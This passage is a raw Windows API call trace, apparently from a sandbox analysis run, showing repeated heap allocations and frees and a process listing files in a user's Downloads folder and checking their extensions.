returned 0x2ac3dd0 [0189.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.716] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\") returned="Downloads\\" [0189.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0189.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.717] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.717] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.717] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.717] PathFindFileNameW (pszPath="") returned="" [0189.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.717] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\*" (normalized: "c:\\users\\keecfmwgj\\downloads\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0189.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.718] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.718] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.719] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini") returned=".ini" [0189.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.719] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0189.719] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0189.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0189.720] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0189.720] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.722] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0189.722] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.722] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.722] PathFindFileNameW (pszPath="C:\\") 